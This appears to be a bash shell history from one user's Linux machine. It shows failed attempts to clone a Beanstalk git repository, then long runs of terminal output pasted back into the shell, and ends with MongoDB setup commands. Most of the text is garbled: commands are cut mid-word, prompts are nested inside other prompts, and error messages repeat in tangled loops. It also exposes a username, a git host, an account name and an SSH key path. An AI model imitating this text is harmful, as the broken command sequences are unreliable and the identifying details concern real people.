~/.ssh/albrechthain_rsa +git clone git@albrechthain.git.beanstalkapp.com:/albrechthain/corpwebsite-starterkit.git +git clone git@albrechthain.git.beanstalkapp.com:/albrechthain/corpwebsite-starterkit.git +vim ~/.ssh/config +vim ~/.ssh/known_hosts +vim ~/.ssh/known_hosts +git clone git@albrechthain.git.beanstalkapp.com:/albrechthain/corpwebsite-starterkit.git +git clonestalkapp.com/corpwebsite-starterkit.git +ls +ls -all +corpwebsite-starterkit kNmg5E60WS.zip startbootstrap-full-slider-gh-pages.zip Website_Theme.png +ite-starterkit.git +Cloning into 'corpwebsite-starterkit'... +Permission denied (publickey). +fatal: Could not read from remote repository. +Please make sure you have the correct access rights +and the repository exists. +[goalador@gatanda Website_Theme]$ git clonestalkapp.com/corpwebsite-starterkit.git +Cloning into 'corpwebsite-starterkit'... +Username for : webappcreations +Password for : +warning: You appear to have cloned an empty repository. +[goalador@gatanda Website_Theme]$ ls +ite-starterkit.git +Cloning into 'corpwebsite-starterkit'... +Permission denied (publickey). +fatal: Could not read from remote repository. +Please make sure you have the correct access rights +and the repository exists. +[goalador@gatanda Website_Theme]$ git clonestalkapp.com/corpwebsite-starterkit.git +Cloning into 'corpwebsite-starterkit'... +Username for : webappcreations +Password for : +warning: You appear to have cloned an empty repository. +[goalador@gatanda Website_Theme]$ ls +[goalador@gatanda corpwebsite-starterkit]$ Password for : +bash: Password: command not found +[goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. + for : webappcreations +Password for : +warning: You appear to have cloned an empty repository. +[goalador@gatanda Website_Theme]$ ls +corpwebsite-starterkit kNmg5E60WS.zip startbootstrap-full-slider-gh-pages.zip Website_Theme.png +[goalador@gatanda Website_Theme]$ cd corpwebsite-starterkit/ +[goalador@gatanda corpwebsite-starterkit]$ ls -all +total 12 +warning::warning::dor@gatanda corpwebsite-starterkit]$ and the repository exists. +bash: and: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda Website_Theme]$ git clonestalkapp.com/corpwebsite-starterkit.git +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ Cloning into 'corpwebsite-starterkit'... +bash: Cloning: command not found +[goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +bash: h: Cloning: command not found +[goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +bash: Username: command not found +[goalador@gatanda corpwebsite-starterkit]$ Password for : +bash: Password: command not found +[goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +bash: warning:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda Website_Theme]$ ls +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +bash: h: Cloning: command not found +[goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +bash: Username: command not found +[goalador@gatanda corpwebsite-starterkit]$ Password for : +bash: Password: command not found +[goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +bash: warning:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda Website_Theme]$ ls +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: Password: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ for : webappcreations +bash: syntax error near unexpected token `webappcreations' +[goalador@gatanda corpwebsite-starterkit]$ Password for : +bash: Password: command not found +[goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +bash: warning:: command not found +[goalgoalador@gatanda corpwebsite-starterkit]$ bash: Password: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: warning:: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda Website_Theme]$ ls +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: h: Cloning: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: Password: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: warning:: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda Website_Theme]$ ls +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ bash: Password: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ for : webappcreations +bash: [goalador@gatanda: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `webappcreations' +> [goalador@gatanda corpwebsite-starterkit]$ Password for : +> bash: Password: command not found +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ bash: Password: command not found +> bash: [goalador@gatanda: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: bash:: command not found +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +> bash: [goalador@gatanda: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: [goalador@gatanda: command not found +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ for : webappcreations +> bash: [goalador@gatanda: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `webap[goalador@gatanda Kunden]$ cd BlueOracleFilms/ +d +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +> bash: [goalador@gatanda: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> bash: [goalador@gatanda: cofound +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +> bash: [goalador@gatanda: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> bash: [goalador@gatanda: commandfound +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +> bash: [goalador@gatanda: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> bash: [goalador@gatanda: commandhttps://webappcreations@albrechthain.git.beanstalkapp.com's@albrechthain.git.beanstalkapp.com':> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> bash: [goalador@gatanda: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: Password: command not found +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +> bash: [goalador@gatanda: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: warning:: command not found +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda Website_Theme]$ ls +> bash: [goalador@gatanda: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: [goalador@gatanda: command not found +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ bash: Password: command not found +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: bash:: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: [goalador@gatanda: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ for : webappcreations +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `webap[goalador@gatanda Kunden]$ cd BlueOracleFilms/ +> d +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> > bash: [goalador@gatanda: cofound +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> > bash: [goalador@gatanda: commandfound +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> > bash: [goalador@gatanda: commandhttps://webappcreations@albrechthain.git.beanstalkapp.com's@albrechthain.git.beanstalkapp.com':> bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for s@albrechthain.git.beanstalkapp.co[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ bash: Password: command not found +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: bash:: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ warning: You appear to have cloned an empty repository. +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: [goalador@gatanda: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ for : webappcreations +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `webap[goalador@gatanda Kunden]$ cd BlueOracleFilms/ +> d +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> > bash: [goalador@gatanda: cofound +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> > bash: [goalador@gatanda: commandfound +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +> > bash: [goalador@gatanda: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for : +> > bash: [goalador@gatanda: commandhttps://webappcreations@albrechthain.git.beanstalkapp.com's@albrechthain.git.beanstalkapp.com':> bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Password for s@albrechthain.git.beanstalkapp.co[goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +[goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ bash: Username: command not found +bash: syntax error near unexpected token `>' +corpwebsite-starterkitcorpwebsite-starterkit]$ > > bash: [goalador@gatanda: commandfound +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ > > bash: [goalador@gatanda: command not found +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkitcorpwebsite-starterkit]$ > > bash: [goalador@gatanda: commandfound +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username for : webappcreations +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ > > bash: [goalador@gatanda: command not found +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 4: syntax error: unexpected end of file +bash: +[goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +bash: syntax error near unexpected token `>: No such file or directory +bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 4: syntax error: unexpected end of file +bash: +[goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +bash: syntax error near unexpected token `>: No such file or directory +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > bash: [goalador@gatanda: command not found +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `>' +> [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 4: syntax error: unexpected end of file +bash: +[goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +bash: syntax error near unexpected token `>: No such file or directory +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > bash: [goalador@gatanda: command not found +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `>' +> [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 3: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `>: No such file or directory +> bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: No: command not found +bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 4: syntax error: unexpected end of file +bash: +[goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +bash: syntax error near unexpected token `>: No such file or directory +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > bash: [goalador@gatanda: command not found +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `>' +> [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 3: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `>: No such file or directory +> bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: No: command not found +bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `>: No such file or directory +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > bash: [goalador@gatanda: command not found +> bash: syntax error near unexpected token `>' +> [goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `>' +bash: No: command not found +bash: command substitution: line 2: syntax error near unexpected token `>' +bash: command substitution: line 2: `[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > bash: [goalador@gatanda: command not found' +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ > [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching `'' +> bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: : command not found +bash: bash:: command not found +bash: corpwebsite-starterkitbash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 1: unexpected EOF while looking for matching `'' +> bash: command substitution: line 4: syntax error: unexpected end of file +> bash: +> [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +> bash: syntax error near unexpected token `>: No such file or directory +bash: : command not found +bash: bash:: command not found +bash: bash:: command not found +bash: command substitution: line 4: syntax error near unexpected token `>' +bash: command substitution: line 4: `[goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations' +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > bash: [goalador@gatanda: command not found +bash: syntax error near unexpected token `>' +[goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `>' +> [goalador@gatanda corpwebsite-starterkit]$ bash: syntax error near unexpected token `>' +> > [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching `'' +> bash: command substitution: line 1: unexpected EOF while looking for matching `'' +> bash: command substitution: line 3: syntax error: unexpected end of file +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +> bash: syntax error near unexpected token `>' +bash: command substitution: line 1: unexpected EOF while looking for matching `'' +bash: command substitution: line 3: syntax error: unexpected end of file +bash: +> [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching ` +bash: command substitution: line 1: unexpected EOF while looking for matching ` +bash: command substitution: line 3: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations + +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +> +> > bash: syntax error near unexpected token `>' +> bash: command substitution: line 1: unexpected EOF while looking for matching `'' +> bash: command substitution: line 3: syntax error: unexpected end of file +> bash: +> > [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching ` +> bash: command substitution: line 1: unexpected EOF while looking for matching ` +> bash: command substitution: line 3: syntax error: unexpected end of file +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +> +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +> > +> + + + + +> bash: +> > [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching ` +> bash: command substitution: line 1: unexpected EOF while looking for matching ` +> bash: command substitution: line 3: syntax error: unexpected end of file +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ bash: +> bash: bash:: command not found +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +> +> > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +> > +> > > bash: syntax error near unexpected token `>' +bash: : command not found +bash: substitution:: command not found +bash: bash::: command not found +bash: corpwebsite-starterkit]$: command not found +bash: bash::: command not found +bash: corpwebsite-starterkit]$: command not found +bash: bash::: command not found +bash: command substitution: line 8: syntax error near unexpected token `>' +bash: command substitution: line 8: `> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations' +bash: +bash: command substitution: line 1: unexpected EOF while looking for matching ` +bash: command substitution: line 3: syntax error: unexpected end of file +bash: +> [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching ` +bash: command substitution: line 1: unexpected EOF while looking for matching ` +bash: command substitution: line 3: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: +bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +> [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ > > [goalador@gatanda corpwebsite-starterkit]$ [goalador@gatanda corpwebsite-starterkit]$ Username forstalkapp.com: webappcreations +> +> > bash: syntax error near unexpected token `>: File name too long +[goalador@gatanda corpwebsite-starterkit]$ > bash: command substitution: line 1: unexpected EOF while looking for matching `'' +> > bash: command substitution: line 3: syntax error: unexpected end of file +> > bash: +> > > [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching ` +bash: : command not found +bash: substitution:: command not found +bash: command substitution: line 4: syntax error near unexpected token `>' +bash: command substitution: line 4: `> > [goalador@gatanda corpwebsite-starterkitbash: command substitution: line 1: unexpected EOF while looking for matching ' +bash: substitution:: command not found +[goalador@gatanda corpwebsite-starterkit]$ > bash: command substitution: line 1: unexpected EOF while looking for matching ` +> > bash: command substitution: line 3: syntax error: unexpected end of file +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error: unexpected end of file +> > bash: bash:: command not found +> > [goalador@gatanda corpwebsite-starterkit]$ bash: +> > bash: bash::bash: bash:: command not found +[goalador@gatanda corpwebsite-starterkit]$ bash: command substitution: line 4: syntax error near unexpected token `>' +clear +exit +passwd +vi .profile +vi .profile +. .profile +cat .profile +vi .profile +man grep +vi .profile +. .profile +cat .profile +vi .profile +vi .profile +ls +ls -lrt +cat .profile +sql +sqlplus +ps -ef +cat frank.sql +pwd +ls +ls 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mongodb-clients +mongo +ls +ls +./mongo +cp mongo /usr/bin/ +su +poweroff +sudo poweroff +mongo +mongod +s +su +mongod -f /etc/mongod.conf +vim /etc/mongod.conf +sudo vim /etc/mongod.conf +mongod -f /etc/mongod.conf +mongo +mongod -f /etc/mongod.conf +killall mongod +sudo vim /etc/mongod.conf +mongod -f /etc/mongod.conf +su +mongod -f /etc/mongod.conf +echo > /etc/mongod.conf +sudo echo > /etc/mongod.conf +sudo echo /etc/mongod.conf +su +service mongodb status +mongo +mongo localhost:28017 +ls +mongo +mongod +mongod -f /etc/mongod.conf +sudo mongod -f /etc/mongod.conf +ll +su +mongod +mongod -f /etc/mongod.conf +sudo mongod -f /etc/mongod.conf +service mongodb start +service 